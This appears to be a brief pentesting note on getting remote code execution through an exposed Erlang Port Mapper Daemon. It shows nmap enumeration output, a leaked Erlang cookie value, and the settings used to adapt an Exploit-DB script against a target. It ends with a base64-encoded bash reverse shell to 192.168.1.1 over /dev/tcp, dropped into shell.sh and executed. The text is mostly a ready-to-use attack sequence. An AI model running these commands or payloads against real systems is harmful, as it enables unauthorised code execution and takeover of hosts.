Erlang - 4369
Erlang Cookie RCE
https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.1.2
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ rabbit: 65000
65000/tcp open unknown
Erlang Cookie RCE
If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start.
There is a epmd port. And rabbit service on 65000 port. We need to rce we need erlang.cookie value. We can brute force it or we can find it via another services on the host.
.erlang.cookie
JFKERIPLFKVJSQRDIXJS
Erlang Cookie - Remote Code Execution
https://www.exploit-db.com/exploits/49418
$ python3 49418
We need to change relevant parts of the code.
TARGET = "192.168.1.2"
PORT = 65000
COOKIE = "JFKERIPLFKVJSQRDIXJS"
CMD = "id"
/bin/bash -i >& /dev/tcp/192.168.1.1/80 0>&1 - Base64 encoded
CMD="echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xLzgwIDA+JjE= | base64 -d > shell.sh"
CMD="bash shell.sh"
Last updated